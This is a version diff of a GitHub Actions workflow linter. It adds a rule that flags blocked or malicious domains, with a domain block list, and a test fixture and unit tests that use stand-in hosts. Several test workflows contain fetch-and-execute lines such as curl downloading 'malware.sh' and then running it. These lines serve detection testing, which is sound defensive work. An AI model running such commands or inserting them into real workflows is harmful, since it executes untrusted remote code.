bitwarden_workflow_linter 1.3.5__tar.gz → 1.4.0__tar.gz

{bitwarden_workflow_linter-1.3.5 → bitwarden_workflow_linter-1.4.0}/PKG-INFO

@@ -1,6 +1,6 @@
 Metadata-Version: 2.4
 Name: bitwarden_workflow_linter
-Version: 1.3.5
+Version: 1.4.0
 Summary: Custom GitHub Action Workflow Linter
 Project-URL: Homepage, https://github.com/bitwarden/workflow-linter
 Project-URL: Issues, https://github.com/bitwarden/workflow-linter/issues

{bitwarden_workflow_linter-1.3.5 → bitwarden_workflow_linter-1.4.0}/settings.yaml

@@ -19,6 +19,12 @@ enabled_rules:
       level: error
     - id: bitwarden_workflow_linter.rules.permissions_exist.RulePermissionsExist
       level: error
+    - id: bitwarden_workflow_linter.rules.check_blocked_domains.RuleCheckBlockedDomains
+      level: warning
 
 approved_actions_path: default_actions.json
 default_branch: main
+
+# List of domains that should trigger an error if found in workflows
+blocked_domains:
+  - ghrc.io

{bitwarden_workflow_linter-1.3.5 → bitwarden_workflow_linter-1.4.0}/src/bitwarden_workflow_linter/__about__.py

@@ -1,3 +1,3 @@
 """Metadata for Workflow Linter."""
 
-__version__ = "1.3.5"
+__version__ = "1.4.0"

{bitwarden_workflow_linter-1.3.5 → bitwarden_workflow_linter-1.4.0}/src/bitwarden_workflow_linter/default_actions.json

@@ -463,5 +463,10 @@
     "name": "yogevbd/enforce-label-action",
     "sha": "a3c219da6b8fa73f6ba62b68ff09c469b3a1c024",
     "version": "2.2.2"
+  },
+  "zizmorcore/zizmor-action": {
+    "name": "zizmorcore/zizmor-action",
+    "sha": "5ca5fc7a4779c5263a3ffa0e1f693009994446d1",
+    "version": "v0.1.2"
   }
 }

{bitwarden_workflow_linter-1.3.5 → bitwarden_workflow_linter-1.4.0}/src/bitwarden_workflow_linter/default_settings.yaml

@@ -19,6 +19,12 @@ enabled_rules:
       level: error
     - id: bitwarden_workflow_linter.rules.permissions_exist.RulePermissionsExist
       level: error
+    - id: bitwarden_workflow_linter.rules.check_blocked_domains.RuleCheckBlockedDomains
+      level: warning
 
 approved_actions_path: default_actions.json
 default_branch: main
+
+# List of domains that should trigger an error if found in workflows
+blocked_domains:
+  - ghrc.io

bitwarden_workflow_linter-1.4.0/src/bitwarden_workflow_linter/rules/check_blocked_domains.py

@@ -0,0 +1,180 @@
+"""A Rule to check for blocked/malicious domains in workflow content."""
+
+import re
+from typing import List, Optional, Tuple, Union
+
+from ..models.job import Job
+from ..models.step import Step
+from ..models.workflow import Workflow
+from ..rule import Rule
+from ..utils import LintLevels, Settings
+
+
+class RuleCheckBlockedDomains(Rule):
+    """Rule to detect blocked or malicious domains in workflow content.
+    
+    This rule scans workflow content (URLs, scripts, commands) for domains
+    that have been flagged as blocked or potentially malicious. It helps
+    prevent supply chain attacks and unauthorized external dependencies.
+    """
+
+    def __init__(self, settings: Optional[Settings] = None, lint_level: Optional[LintLevels] = LintLevels.ERROR) -> None:
+        """Constructor for RuleCheckBlockedDomains.
+
+        Args:
+          settings:
+            A Settings object that contains any default, overridden, or custom settings
+            required anywhere in the application.
+          lint_level:
+            The LintLevels enum value to determine the severity of the rule.
+        """
+        self.on_fail = lint_level
+        self.compatibility = [Workflow, Job, Step]
+        self.settings = settings
+        
+        # Get blocked domains from settings, use defaults if none provided
+        self.blocked_domains = settings.blocked_domains if settings else []
+
+    def extract_domains_from_text(self, text: str) -> List[str]:
+        """Extract domain names from text content.
+        
+        Args:
+            text: The text to scan for domains
+            
+        Returns:
+            List of domain names found in the text
+        """
+        if not text:
+            return []
+            
+        # Pattern to match domain names in various contexts
+        # Breaking down the regex:
+        # (?:https?://)?           - Optional protocol (http:// or https://)
+        # (?:www\.)?               - Optional www. prefix
+        # ([a-zA-Z0-9]             - Start of capturing group: first character (alphanumeric)
+        #   (?:[a-zA-Z0-9-]{0,61}  - Non-capturing group: 0-61 alphanumeric or hyphen chars
+        #   [a-zA-Z0-9])?          - End with alphanumeric (ensures no trailing hyphen)
+        # \.)+                     - Followed by dot, repeated (for subdomains)
+        # [a-zA-Z]{2,}             - Top-level domain (2+ letters)
+        # (?:/[^\s]*)?             - Optional path (slash followed by non-whitespace chars)
+        domain_pattern = r'(?:https?://)?(?:www\.)?([a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,}(?:/[^\s]*)?'
+        
+        domains = set()
+        
+        # Find all matches and extract the domain part
+        for match in re.finditer(domain_pattern, text, re.IGNORECASE):
+            full_match = match.group(0)
+            # Clean up the domain (remove protocol, www, path)
+            domain = re.sub(r'^https?://', '', full_match)
+            domain = re.sub(r'^www\.', '', domain)
+            domain = re.sub(r'/.*$', '', domain)  # Remove path
+            domain = domain.lower().strip()
+            
+            if domain and '.' in domain:
+                domains.add(domain)
+        
+        return list(domains)
+
+    def check_blocked_domains(self, text: str) -> Tuple[bool, List[str]]:
+        """Check if text contains any blocked domains.
+        
+        Args:
+            text: The text to check for blocked domains
+            
+        Returns:
+            Tuple of (is_clean, list_of_found_blocked_domains)
+        """
+        if not text:
+            return True, []
+            
+        domains = self.extract_domains_from_text(text)
+        blocked_found = []
+        
+        for domain in domains:
+            for blocked_domain in self.blocked_domains:
+                blocked_domain_lc = blocked_domain.lower().strip()
+                domain_lc = domain.lower().strip()
+                # Check for exact match or subdomain match
+                if domain_lc == blocked_domain_lc or domain_lc.endswith('.' + blocked_domain_lc):
+                    blocked_found.append(domain)
+                    
+        return len(blocked_found) == 0, blocked_found
+
+    def fn(self, obj: Union[Workflow, Job, Step]) -> Tuple[bool, str]:
+        """Check the workflow object for blocked domains.
+
+        Args:
+          obj: The workflow object (Workflow, Job, or Step) to check
+
+        Returns:
+          Tuple of (success, error_message)
+        """
+        blocked_domains_found = []
+        
+        if isinstance(obj, Workflow):
+            # Check workflow-level content
+            if obj.name:
+                is_clean, domains = self.check_blocked_domains(obj.name)
+                if not is_clean:
+                    blocked_domains_found.extend([(f"workflow name", domain) for domain in domains])
+                    
+        elif isinstance(obj, Job):
+            # Check job-level content
+            if obj.name:
+                is_clean, domains = self.check_blocked_domains(obj.name)
+                if not is_clean:
+                    blocked_domains_found.extend([(f"job name", domain) for domain in domains])
+                    
+            if obj.uses:
+                is_clean, domains = self.check_blocked_domains(obj.uses)
+                if not is_clean:
+                    blocked_domains_found.extend([(f"job uses", domain) for domain in domains])
+                    
+            # Check environment variables
+            if obj.env:
+                for key, value in obj.env.items():
+                    if isinstance(value, str):
+                        is_clean, domains = self.check_blocked_domains(value)
+                        if not is_clean:
+                            blocked_domains_found.extend([(f"job env '{key}'", domain) for domain in domains])
+                            
+        elif isinstance(obj, Step):
+            # Check step-level content
+            if obj.name:
+                is_clean, domains = self.check_blocked_domains(obj.name)
+                if not is_clean:
+                    blocked_domains_found.extend([(f"step name", domain) for domain in domains])
+                    
+            if obj.uses:
+                is_clean, domains = self.check_blocked_domains(obj.uses)
+                if not is_clean:
+                    blocked_domains_found.extend([(f"step uses", domain) for domain in domains])
+                    
+            if obj.run:
+                is_clean, domains = self.check_blocked_domains(obj.run)
+                if not is_clean:
+                    blocked_domains_found.extend([(f"step run command", domain) for domain in domains])
+                    
+            # Check environment variables
+            if obj.env:
+                for key, value in obj.env.items():
+                    if isinstance(value, str):
+                        is_clean, domains = self.check_blocked_domains(value)
+                        if not is_clean:
+                            blocked_domains_found.extend([(f"step env '{key}'", domain) for domain in domains])
+                            
+            # Check step with parameters
+            if obj.uses_with:
+                for key, value in obj.uses_with.items():
+                    if isinstance(value, str):
+                        is_clean, domains = self.check_blocked_domains(value)
+                        if not is_clean:
+                            blocked_domains_found.extend([(f"step with '{key}'", domain) for domain in domains])
+
+        if blocked_domains_found:
+            error_details = []
+            for location, domain in blocked_domains_found:
+                error_details.append(f"Found blocked domain '{domain}' in {location}")
+            return False, "; ".join(error_details)
+            
+        return True, ""

{bitwarden_workflow_linter-1.3.5 → bitwarden_workflow_linter-1.4.0}/src/bitwarden_workflow_linter/utils.py

@@ -114,6 +114,7 @@ class Settings:
     approved_actions: dict[str, Action]
     actionlint_version: str
     default_branch: Optional[str]
+    blocked_domains: Optional[list[str]]
 
     def __init__(
         self,
@@ -121,6 +122,7 @@ class Settings:
         approved_actions: Optional[dict[str, dict[str, str]]] = None,
         actionlint_version: Optional[str] = None,
         default_branch: Optional[str] = None,
+        blocked_domains: Optional[list[str]] = None,
     ) -> None:
         """Settings object that can be overridden in settings.py.
 
@@ -147,6 +149,7 @@ class Settings:
             name: Action(**action) for name, action in approved_actions.items()
         }
         self.default_branch = default_branch
+        self.blocked_domains = blocked_domains or []
 
     @staticmethod
     def factory() -> SettingsFromFactory:
@@ -201,4 +204,5 @@ class Settings:
             approved_actions=settings["approved_actions"],
             actionlint_version=actionlint_version,
             default_branch=default_branch,
+            blocked_domains=settings.get("blocked_domains", []),
         )

bitwarden_workflow_linter-1.4.0/tests/fixtures/test-blocked-domains.yml

@@ -0,0 +1,34 @@
+name: Test Blocked Domains
+on:
+  push:
+  pull_request:
+
+jobs:
+  clean-job:
+    name: Clean Job
+    runs-on: ubuntu-latest
+    steps:
+      - name: Checkout
+        uses: actions/checkout@v4
+      
+      - name: Run safe command
+        run: echo "This is safe"
+
+  job-with-blocked-domain:
+    name: Job with malicious-example.com reference
+    runs-on: ubuntu-latest
+    env:
+      DOWNLOAD_URL: https://suspicious-domain.org/config.json
+    steps:
+      - name: Download from blocked domain
+        run: |
+          curl -o script.sh https://untrusted-repo.net/malware.sh
+          chmod +x script.sh
+          
+      - name: Use blocked action
+        uses: bad-actor.io/malicious-action@v1
+        with:
+          config_url: https://malicious-example.com/config
+          backup_server: untrusted-repo.net/backup
+        env:
+          API_ENDPOINT: https://suspicious-domain.org/api

bitwarden_workflow_linter-1.4.0/tests/rules/test_check_blocked_domains.py

@@ -0,0 +1,316 @@
+"""Test src/bitwarden_workflow_linter/rules/check_blocked_domains.py."""
+
+import pytest
+from ruamel.yaml import YAML
+
+from src.bitwarden_workflow_linter.load import WorkflowBuilder
+from src.bitwarden_workflow_linter.models.job import Job
+from src.bitwarden_workflow_linter.models.step import Step
+from src.bitwarden_workflow_linter.models.workflow import Workflow
+from src.bitwarden_workflow_linter.rules.check_blocked_domains import RuleCheckBlockedDomains
+from src.bitwarden_workflow_linter.utils import Settings, LintLevels
+
+yaml = YAML()
+
+
+@pytest.fixture(name="settings")
+def fixture_settings():
+    return Settings(
+        blocked_domains=[
+            'malicious-example.com',
+            'suspicious-domain.org',
+            'untrusted-repo.net',
+            'bad-actor.io'
+        ]
+    )
+
+
+@pytest.fixture(name="rule")
+def fixture_rule(settings):
+    return RuleCheckBlockedDomains(settings=settings)
+
+
+class TestRuleCheckBlockedDomains:
+    """Test the RuleCheckBlockedDomains rule."""
+
+    def test_extract_domains_from_text(self, rule):
+        """Test domain extraction from various text formats."""
+        test_cases = [
+            ("https://example.com/path", ["example.com"]),
+            ("http://www.test.org", ["test.org"]),
+            ("Visit malicious-example.com for info", ["malicious-example.com"]),
+            ("Download from https://suspicious-domain.org/file.zip", ["suspicious-domain.org"]),
+            ("No domains here", []),
+            ("", []),
+            ("Multiple: example.com and test.org", ["example.com", "test.org"]),
+        ]
+        
+        for text, expected in test_cases:
+            domains = rule.extract_domains_from_text(text)
+            # Sort both lists for comparison since order doesn't matter
+            assert sorted(domains) == sorted(expected), f"Failed for text: '{text}'"
+
+    def test_check_blocked_domains_clean_text(self, rule):
+        """Test checking text with no blocked domains."""
+        clean_texts = [
+            "https://github.com/bitwarden/workflow-linter",
+            "Download from npm registry",
+            "Visit our documentation at docs.bitwarden.com",
+            ""
+        ]
+        
+        for text in clean_texts:
+            is_clean, blocked = rule.check_blocked_domains(text)
+            assert is_clean, f"Text should be clean: '{text}'"
+            assert len(blocked) == 0
+
+    def test_check_blocked_domains_with_blocked(self, rule):
+        """Test checking text with blocked domains."""
+        blocked_texts = [
+            ("https://malicious-example.com/download", ["malicious-example.com"]),
+            ("Visit suspicious-domain.org", ["suspicious-domain.org"]),
+            ("curl https://untrusted-repo.net/script.sh", ["untrusted-repo.net"]),
+            ("Multiple: malicious-example.com and suspicious-domain.org", 
+             ["malicious-example.com", "suspicious-domain.org"])
+        ]
+        
+        for text, expected_domains in blocked_texts:
+            is_clean, blocked = rule.check_blocked_domains(text)
+            assert not is_clean, f"Text should not be clean: '{text}'"
+            assert len(blocked) > 0
+            # Check that all expected domains are found
+            for domain in expected_domains:
+                assert domain in blocked, f"Expected domain '{domain}' not found in {blocked}"
+
+    def test_workflow_level_check_clean(self, rule):
+        """Test workflow-level checking with clean content."""
+        workflow_yaml = """
+        name: Clean Workflow
+        on:
+          push:
+        jobs:
+          test:
+            runs-on: ubuntu-latest
+            steps:
+              - name: Checkout
+                uses: actions/checkout@v4
+        """
+        
+        workflow_data = yaml.load(workflow_yaml)
+        workflow = Workflow.init("", "test.yml", workflow_data)
+        
+        success, message = rule.fn(workflow)
+        assert success, f"Workflow should pass: {message}"
+
+    def test_workflow_level_check_blocked(self, rule):
+        """Test workflow-level checking with blocked domain."""
+        workflow_yaml = """
+        name: Download from malicious-example.com
+        on:
+          push:
+        jobs:
+          test:
+            runs-on: ubuntu-latest
+            steps:
+              - name: Test
+                run: echo "test"
+        """
+        
+        workflow_data = yaml.load(workflow_yaml)
+        workflow = Workflow.init("", "test.yml", workflow_data)
+        
+        success, message = rule.fn(workflow)
+        assert not success, "Workflow should fail due to blocked domain"
+        assert "malicious-example.com" in message
+        assert "workflow name" in message
+
+    def test_job_level_check_clean(self, rule):
+        """Test job-level checking with clean content."""
+        job_data = yaml.load("""
+        name: Clean Job
+        runs-on: ubuntu-latest
+        env:
+          API_URL: https://api.github.com
+        steps:
+          - name: Test
+            run: echo "test"
+        """)
+        
+        job = Job.init("test-job", job_data)
+        
+        success, message = rule.fn(job)
+        assert success, f"Job should pass: {message}"
+
+    def test_job_level_check_blocked_in_name(self, rule):
+        """Test job-level checking with blocked domain in name."""
+        job_data = yaml.load("""
+        name: Download from suspicious-domain.org
+        runs-on: ubuntu-latest
+        steps:
+          - name: Test
+            run: echo "test"
+        """)
+        
+        job = Job.init("test-job", job_data)
+        
+        success, message = rule.fn(job)
+        assert not success, "Job should fail due to blocked domain in name"
+        assert "suspicious-domain.org" in message
+        assert "job name" in message
+
+    def test_job_level_check_blocked_in_uses(self, rule):
+        """Test job-level checking with blocked domain in uses."""
+        job_data = yaml.load("""
+        uses: malicious-example.com/action@v1
+        """)
+        
+        job = Job.init("test-job", job_data)
+        
+        success, message = rule.fn(job)
+        assert not success, "Job should fail due to blocked domain in uses"
+        assert "malicious-example.com" in message
+        assert "job uses" in message
+
+    def test_job_level_check_blocked_in_env(self, rule):
+        """Test job-level checking with blocked domain in environment variable."""
+        job_data = yaml.load("""
+        name: Test Job
+        runs-on: ubuntu-latest
+        env:
+          DOWNLOAD_URL: https://untrusted-repo.net/file.zip
+        steps:
+          - name: Test
+            run: echo "test"
+        """)
+        
+        job = Job.init("test-job", job_data)
+        
+        success, message = rule.fn(job)
+        assert not success, "Job should fail due to blocked domain in env"
+        assert "untrusted-repo.net" in message
+        assert "job env 'DOWNLOAD_URL'" in message
+
+    def test_step_level_check_clean(self, rule):
+        """Test step-level checking with clean content."""
+        step_data = yaml.load("""
+        name: Checkout code
+        uses: actions/checkout@v4
+        """)
+        
+        step = Step.init(0, "test-job", step_data)
+        
+        success, message = rule.fn(step)
+        assert success, f"Step should pass: {message}"
+
+    def test_step_level_check_blocked_in_uses(self, rule):
+        """Test step-level checking with blocked domain in uses."""
+        step_data = yaml.load("""
+        name: Download malicious action
+        uses: malicious-example.com/action@v1
+        """)
+        
+        step = Step.init(0, "test-job", step_data)
+        
+        success, message = rule.fn(step)
+        assert not success, "Step should fail due to blocked domain in uses"
+        assert "malicious-example.com" in message
+        assert "step uses" in message
+
+    def test_step_level_check_blocked_in_run(self, rule):
+        """Test step-level checking with blocked domain in run command."""
+        step_data = yaml.load("""
+        name: Download script
+        run: |
+          curl -o script.sh https://suspicious-domain.org/malware.sh
+          chmod +x script.sh
+          ./script.sh
+        """)
+        
+        step = Step.init(0, "test-job", step_data)
+        
+        success, message = rule.fn(step)
+        assert not success, "Step should fail due to blocked domain in run"
+        assert "suspicious-domain.org" in message
+        assert "step run command" in message
+
+    def test_step_level_check_blocked_in_with(self, rule):
+        """Test step-level checking with blocked domain in with parameters."""
+        step_data = yaml.load("""
+        name: Configure action
+        uses: some/action@v1
+        with:
+          config_url: https://untrusted-repo.net/config.json
+          backup_url: https://malicious-example.com/backup
+        """)
+        
+        step = Step.init(0, "test-job", step_data)
+        
+        success, message = rule.fn(step)
+        assert not success, "Step should fail due to blocked domains in with"
+        assert ("untrusted-repo.net" in message or "malicious-example.com" in message)
+        assert ("step with" in message)
+
+    def test_step_level_check_blocked_in_env(self, rule):
+        """Test step-level checking with blocked domain in environment variable."""
+        step_data = yaml.load("""
+        name: Test step with env
+        run: echo "Testing"
+        env:
+          API_ENDPOINT: https://bad-actor.io/api
+          BACKUP_URL: untrusted-repo.net/backup
+        """)
+        
+        step = Step.init(0, "test-job", step_data)
+        
+        success, message = rule.fn(step)
+        assert not success, "Step should fail due to blocked domain in env"
+        assert ("bad-actor.io" in message or "untrusted-repo.net" in message)
+        assert "step env" in message
+
+    def test_multiple_blocked_domains_in_single_step(self, rule):
+        """Test step with multiple blocked domains."""
+        step_data = yaml.load("""
+        name: Multiple blocked domains
+        run: |
+          curl https://malicious-example.com/file1
+          wget https://suspicious-domain.org/file2
+        """)
+        
+        step = Step.init(0, "test-job", step_data)
+        
+        success, message = rule.fn(step)
+        assert not success, "Step should fail due to multiple blocked domains"
+        assert "malicious-example.com" in message
+        assert "suspicious-domain.org" in message
+
+    def test_rule_with_custom_blocked_domains(self):
+        """Test rule with custom blocked domains list."""
+        custom_settings = Settings(
+            blocked_domains=['custom-bad.com', 'another-threat.net']
+        )
+        custom_rule = RuleCheckBlockedDomains(settings=custom_settings)
+        
+        step_data = yaml.load("""
+        name: Test custom domains
+        run: curl https://custom-bad.com/script.sh
+        """)
+        
+        step = Step.init(0, "test-job", step_data)
+        
+        success, message = custom_rule.fn(step)
+        assert not success, "Step should fail with custom blocked domain"
+        assert "custom-bad.com" in message
+
+    def test_rule_compatibility(self, rule):
+        """Test that rule is compatible with all object types."""
+        assert Workflow in rule.compatibility
+        assert Job in rule.compatibility  
+        assert Step in rule.compatibility
+
+    def test_rule_lint_level_configuration(self, settings):
+        """Test rule with different lint levels."""
+        error_rule = RuleCheckBlockedDomains(settings=settings, lint_level=LintLevels.ERROR)
+        warning_rule = RuleCheckBlockedDomains(settings=settings, lint_level=LintLevels.WARNING)
+        
+        assert error_rule.on_fail == LintLevels.ERROR
+        assert warning_rule.on_fail == LintLevels.WARNING